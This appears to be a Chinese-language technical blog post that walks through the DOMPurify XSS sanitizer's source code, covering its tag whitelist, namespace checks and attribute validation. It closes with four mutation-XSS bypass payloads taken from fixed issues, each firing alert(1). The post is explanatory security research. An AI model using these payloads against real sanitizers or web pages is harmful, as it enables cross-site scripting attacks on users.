0x00 DOMPurify 介绍
DOMPurify是一个开源的基于DOM的快速XSS净化工具。输入HTML元素,然后通过DOM解析递归元素节点,进行净化,输出安全的HTML。
github地址:https://github.com/cure53/DOMPurify
现在最新版本:2.2.8
const createDOMPurify = require('dompurify');
const { JSDOM } = require('jsdom');
const window = new JSDOM('').window;
const DOMPurify = createDOMPurify(window);
const clean = DOMPurify.sanitize("<img/src=x onerror=alert(1)>");
这段代码最后输出 <img src="x">
DOMPurify.sanitize 函数是最常见的用法,也可以接两个参数,第二个参数位为相关配置。可参考官方文档。
DOMPurify使用到了ES6中语法,我打算通过webstorm使用node进行调试,所以还需要一些操作,如下(可参考:Node.js 中使用 ES6 中的 import / export 的方法大全):
https://github.com/cure53/DOMPurify/tree/main/src
全部拉下来,后缀名改成mjs。import createDOMPurify from "./DOMPurify-main/src/purify.mjs"; import JSDOM from 'jsdom'; const window = new JSDOM.JSDOM('').window; const DOMPurify = createDOMPurify(window); const html = "<img/src=x onerror=alert(1)>"; console.log(DOMPurify.sanitize(html));跟进分析santize函数主要代码:
const nodeIterator = _createIterator(IN_PLACE ? dirty : body);
/* Now start iterating over the created document */
while ((currentNode = nodeIterator.nextNode())) {
/* Fix IE's strange behavior with manipulated textNodes #89 */
if (currentNode.nodeType === 3 && currentNode === oldNode) {
continue;
}
/* Sanitize tags and elements */
if (_sanitizeElements(currentNode)) {
continue;
}
/* Shadow DOM detected, sanitize it */
if (currentNode.content instanceof DocumentFragment) {
_sanitizeShadowDOM(currentNode.content);
}
/* Check attributes, sanitize if necessary */
_sanitizeAttributes(currentNode);
oldNode = currentNode;
}
oldNode = null;
dirty 为待净化的对象,即我们输入的数据。
_createIterator
函数以及while ((currentNode = nodeIterator.nextNode()))
,会将输入元素转化成逐个的HTMLelement 元素。如 <img src=x><svg src=x>
会转成img和svg两个元素_sanitizeElements
,一个是_sanitizeAttributes
。_sanitizeElements
函数,顾名思义,即净化标签_sanitizeAttributes
即净化标签的属性/* Check if tagname contains Unicode */
if (stringMatch(currentNode.nodeName, /[\u0080-\uFFFF]/)) {
_forceRemove(currentNode);
return true;
}
/* Now let's check the element's type and name */
const tagName = stringToLowerCase(currentNode.nodeName);
标签名字包含unicode字符的,直接移除。然后标签名同一转成小写。
if (!ALLOWED_TAGS[tagName] || FORBID_TAGS[tagName]) {
/* Keep content except for bad-listed elements */
if (KEEP_CONTENT && !FORBID_CONTENTS[tagName]) {
const parentNode = getParentNode(currentNode) || currentNode.parentNode;
const childNodes = getChildNodes(currentNode) || currentNode.childNodes;
if (childNodes && parentNode) {
const childCount = childNodes.length;
for (let i = childCount - 1; i >= 0; --i) {
parentNode.insertBefore(
cloneNode(childNodes[i], true),
getNextSibling(currentNode)
);
}
}
}
_forceRemove(currentNode);
return true;
}
过滤不在白名单的标签,白名单在tags.js。
export const html = freeze([
'a',
'abbr',
'acronym',
'address',
'area',
'article',
'aside',
'audio',
'b',
......
/* Check whether element has a valid namespace */
if (currentNode instanceof Element && !_checkValidNamespace(currentNode)) {
_forceRemove(currentNode);
return true;
}
if (
(tagName === 'noscript' || tagName === 'noembed') &&
regExpTest(/<\/no(script|embed)/i, currentNode.innerHTML)
) {
_forceRemove(currentNode);
return true;
}
校验命名空间,曾经有过bypass,下面还有个对noscript标签的校验操作,感觉有点多余,因为不在白名单里,已经在上面就被remove了。
首先不管是什么属性,都直接从当前currentNode remove。
if (hookEvent.forceKeepAttr) {
continue;
}
/* Remove attribute */
_removeAttribute(name, currentNode);
/* Did the hooks approve of the attribute? */
if (!hookEvent.keepAttr) {
continue;
}
然后根据标签名,还有属性名,属性的值进行一个_isValidAttribute
的判断。
const lcTag = currentNode.nodeName.toLowerCase();
if (!_isValidAttribute(lcTag, lcName, value)) {
continue;
}
如果是合法的attr,则调用setAttribute方法将attr进行还原。
关键的_isValidAttribute
函数。 可以调试尝试绕过....nice try....
if (ALLOW_DATA_ATTR && regExpTest(DATA_ATTR, lcName)) {
// This attribute is safe
} else if (ALLOW_ARIA_ATTR && regExpTest(ARIA_ATTR, lcName)) {
// This attribute is safe
/* Otherwise, check the name is permitted */
} else if (!ALLOWED_ATTR[lcName] || FORBID_ATTR[lcName]) {
return false;
/* Check value is safe. First, is attr inert? If so, is safe */
} else if (URI_SAFE_ATTRIBUTES[lcName]) {
// This attribute is safe
/* Check no script, data or unknown possibly unsafe URI
unless we know URI values are safe for that attribute */
} else if (
regExpTest(IS_ALLOWED_URI, stringReplace(value, ATTR_WHITESPACE, ''))
) {
// This attribute is safe
/* Keep image data URIs alive if src/xlink:href is allowed */
/* Further prevent gadget XSS for dynamically built script tags */
} else if (
(lcName === 'src' || lcName === 'xlink:href' || lcName === 'href') &&
lcTag !== 'script' &&
stringIndexOf(value, 'data:') === 0 &&
DATA_URI_TAGS[lcTag]
) {
// This attribute is safe
/* Allow unknown protocols: This provides support for links that
are handled by protocol handlers which may be unknown ahead of
time, e.g. fb:, spotify: */
} else if (
ALLOW_UNKNOWN_PROTOCOLS &&
!regExpTest(IS_SCRIPT_OR_DATA, stringReplace(value, ATTR_WHITESPACE, ''))
) {
// This attribute is safe
/* Check for binary attributes */
// eslint-disable-next-line no-negated-condition
} else if (!value) {
// Binary attributes are safe at this point
/* Anything else, presume unsafe, do not add it back */
} else {
return false;
}
可以在pull requests 和 releases的更新日志找到, 如:
混淆命名空间绕过:https://github.com/cure53/DOMPurify/pull/495
payloads:
<form><math><mtext></form><form><mglyph><style></math><img src onerror=alert(1)>
<svg></p><style><a id="</style><img src=1 onerror=alert(1)>">
<math><mtext><table><mglyph><style><!--</style><img title="--><img src=1 onerror=alert(1)>">
<form><math><mtext></form><form><mglyph><svg><mtext><style><path id="</style><img onerror=alert(\'XSS\') src>">
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。
原创声明:本文系作者授权腾讯云开发者社区发表,未经许可,不得转载。
如有侵权,请联系 cloudcommunity@tencent.com 删除。